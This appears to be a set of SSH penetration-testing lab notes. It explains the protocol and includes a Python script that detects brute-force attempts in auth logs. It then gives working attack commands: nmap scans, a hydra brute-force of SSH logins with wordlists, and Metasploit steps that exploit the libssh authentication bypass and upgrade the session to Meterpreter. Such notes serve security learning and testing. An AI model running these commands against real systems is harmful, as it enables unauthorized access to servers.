SSH

SSH (Secure Shell) is a secure protocol used for remote access and administration of servers and systems. It is the successor to Telnet and provides encryption to protect communication from interception.

By default, SSH runs on TCP port 22, but it can be configured to use any other open TCP port. Authentication in SSH can be set up in two ways:

  • Username and password authentication – Requires a valid username and password.

  • Key-based authentication – Uses cryptographic key pairs for secure access.

If an SSH server relies on username and password authentication, attackers may attempt a brute-force attack to guess valid credentials and gain unauthorized access to the system.
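On the defensive side, the password-guessing activity described above shows up in the server's auth log as a burst of sshd "Failed password" lines from one source. The following added example (not part of the original page) parses a few constructed auth.log lines, flags a source address that exceeds a failure threshold inside a sliding time window, and records whether a flagged source later got an "Accepted" login; the log lines, year, threshold and window are all assumed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth.log lines in OpenSSH/syslog format (not real logs):
# six password failures from one source within seconds, then an accepted login.
SAMPLE_AUTH_LOG = """\
Mar 10 12:00:01 host sshd[1201]: Failed password for invalid user admin from 198.51.100.23 port 50210 ssh2
Mar 10 12:00:02 host sshd[1202]: Failed password for invalid user test from 198.51.100.23 port 50211 ssh2
Mar 10 12:00:03 host sshd[1203]: Failed password for root from 198.51.100.23 port 50212 ssh2
Mar 10 12:00:04 host sshd[1204]: Failed password for root from 198.51.100.23 port 50213 ssh2
Mar 10 12:00:05 host sshd[1205]: Failed password for root from 198.51.100.23 port 50214 ssh2
Mar 10 12:00:06 host sshd[1206]: Failed password for root from 198.51.100.23 port 50215 ssh2
Mar 10 12:00:09 host sshd[1207]: Accepted password for root from 198.51.100.23 port 50216 ssh2
Mar 10 12:05:00 host sshd[1300]: Failed password for alice from 203.0.113.7 port 40000 ssh2
Mar 10 12:05:30 host sshd[1301]: Accepted publickey for alice from 203.0.113.7 port 40001 ssh2
"""

# Matches sshd "Failed <method> for [invalid user] <user> from <ip>" and "Accepted ..." lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_events(log_text, year=2024):
    """Yield (timestamp, result, method, user, ip); syslog lacks the year, so it is assumed."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["method"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold password failures in a sliding window; note any later accepted login."""
    recent = defaultdict(list)   # ip -> [(ts, user)] failures still inside the window
    alerts = {}
    for ts, result, method, user, ip in sorted(parse_events(log_text)):
        if result == "Failed" and method == "password":
            q = recent[ip]
            q.append((ts, user))
            while ts - q[0][0] > window:   # drop failures older than the window
                q.pop(0)
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "users": set(), "success_after": None})
                a["failures"] = max(a["failures"], len(q))
                a["users"].update(u for _, u in q)
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["success_after"] = user   # guessing followed by a login: top priority
    return alerts
```

A flagged source with `success_after` set should be treated as a likely compromise rather than noise. Disabling password logins in sshd_config (`PasswordAuthentication no`) and relying on key-based authentication removes the guessing surface entirely.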

Techniques

# Service/version scan to confirm SSH and its banner
nmap -sV [TARGET IP]

# Brute-force (wordlists from the lab's Metasploit wordlist directory)
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt [TARGET IP] -t 4 ssh

# Log in with a recovered credential
ssh [USER]@[TARGET_IP]

Exploitation

libssh is a cross-platform C library that implements the SSHv2 protocol for both client and server.

libssh versions 0.6.0 through 0.8.0 contain a vulnerability in the server-side code that lets an attacker bypass authentication and execute commands on the affected server, which makes it a significant security risk for any exposed libssh-based server.

# SYN scan with version and OS detection to identify a libssh server
nmap -sS -sV -O [TARGET]

# In msfconsole: locate and run the libssh auth-bypass scanner
search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
set SPAWN_PTY true
sessions

# Upgrade the resulting shell session to Meterpreter
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
set SESSION [SESSION ID]
exploit
